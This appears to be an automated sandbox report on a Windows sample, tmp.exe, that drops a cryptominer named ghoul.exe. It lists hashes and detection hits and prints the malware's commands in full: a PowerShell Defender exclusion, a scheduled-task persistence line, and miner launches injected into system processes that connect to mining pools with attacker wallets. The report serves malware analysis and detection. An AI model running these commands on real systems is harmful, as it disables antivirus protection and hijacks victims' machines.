Analysis
-
max time kernel
53s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
03/01/2023, 17:49
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20221111-en
General
-
Target
tmp.exe
-
Size
1.5MB
-
MD5
4c8d2d06487d07ec350aa5c5d699bb55
-
SHA1
adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d
-
SHA256
5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567
-
SHA512
37f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab
-
SSDEEP
24576:BjhhhkB/Aw/ApZAZv8743EDweFLBNlYesa49t03jN0AK+HoD5PD:Rhhh6FQcv883EDhp5x4S0AKp9
Malware Config
Signatures
-
Detectes Phoenix Miner Payload 4 IoCs
resource yara_rule behavioral1/memory/1956-98-0x0000000140829C40-mapping.dmp miner_phoenix behavioral1/memory/1956-101-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral1/memory/1956-102-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral1/memory/1956-103-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix -
Executes dropped EXE 1 IoCs
pid Process 700 ghoul.exe -
resource yara_rule behavioral1/memory/1956-94-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1956-96-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1956-99-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1956-100-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1956-97-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1956-101-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1956-102-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral1/memory/1956-103-0x0000000140000000-0x000000014082B000-memory.dmp upx -
Loads dropped DLL 1 IoCs
pid Process 956 tmp.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1956 RegSvcs.exe 1956 RegSvcs.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 700 set thread context of 816 700 ghoul.exe 35 PID 700 set thread context of 1956 700 ghoul.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1728 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 524 powershell.exe 700 ghoul.exe 700 ghoul.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 700 ghoul.exe Token: SeDebugPrivilege 524 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 956 wrote to memory of 700 956 tmp.exe 28 PID 956 wrote to memory of 700 956 tmp.exe 28 PID 956 wrote to memory of 700 956 tmp.exe 28 PID 956 wrote to memory of 700 956 tmp.exe 28 PID 700 wrote to memory of 524 700 ghoul.exe 29 PID 700 wrote to memory of 524 700 ghoul.exe 29 PID 700 wrote to memory of 524 700 ghoul.exe 29 PID 700 wrote to memory of 1896 700 ghoul.exe 31 PID 700 wrote to memory of 1896 700 ghoul.exe 31 PID 700 wrote to memory of 1896 700 ghoul.exe 31 PID 1896 wrote to memory of 1728 1896 cmd.exe 33 PID 1896 wrote to memory of 1728 1896 cmd.exe 33 PID 1896 wrote to memory of 1728 1896 cmd.exe 33 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 700 wrote to memory of 816 700 ghoul.exe 35 PID 816 wrote to memory of 1136 816 vbc.exe 36 PID 816 wrote to memory of 1136 816 vbc.exe 36 PID 816 wrote to memory of 1136 816 vbc.exe 36 PID 700 wrote to memory of 1956 700 ghoul.exe 38 PID 700 wrote to memory of 1956 700 ghoul.exe 38 PID 700 wrote to memory of 1956 700 ghoul.exe 38 PID 700 wrote to memory of 1956 700 ghoul.exe 38 PID 700 wrote to memory of 1956 700 ghoul.exe 38 PID 700 wrote to memory of 1956 700 ghoul.exe 38 PID 700 wrote to memory of 1956 700 ghoul.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Users\Admin\AppData\Local\Temp\ghoul.exe"C:\Users\Admin\AppData\Local\Temp\ghoul.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"4⤵
- Creates scheduled task(s)
PID:1728
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RN9B8LkT5BcYXbc4ZVMYitfgKaA1wwbXwy.work -p x -t 33⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:1136
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0x20caf9B2c7aB54C3cB949F1489DD697327131861.Rig001 -coin etc -log 03⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1956
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
899KB
MD5813862d29c21094ebd1f95feb80771ff
SHA15e61691a9d791e798e19d99a27c9f9959d319e9b
SHA2565f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a
SHA51297fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580
-
Filesize
899KB
MD5813862d29c21094ebd1f95feb80771ff
SHA15e61691a9d791e798e19d99a27c9f9959d319e9b
SHA2565f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a
SHA51297fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580
-
Filesize
899KB
MD5813862d29c21094ebd1f95feb80771ff
SHA15e61691a9d791e798e19d99a27c9f9959d319e9b
SHA2565f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a
SHA51297fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580